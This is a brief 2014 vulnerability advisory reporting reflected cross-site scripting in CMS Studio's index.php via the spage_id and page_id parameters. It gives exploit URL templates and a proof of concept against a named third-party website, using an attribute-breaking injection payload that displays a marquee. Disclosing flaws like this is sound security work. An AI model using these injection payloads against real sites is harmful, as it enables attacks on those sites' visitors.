# Multiple Cross Site Scripting on CMS STUDIO
# Risk: Low
# CWE number: CWE-79
# Date: 15/04/2014
# Vendor: www.cmsstudio.info
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on Windows 8 pro
# Vulnerable File: index.php
# Exploit: http://host/index.php?spage_id=[xss]
#          http://host/index.php?page_id=[xss]
# PoC: 
      - Target: destefiko.rs
      - Vuln. File: /index.php?spage_id=
      - Exploit: "><marquee>Vulnerable</marquee>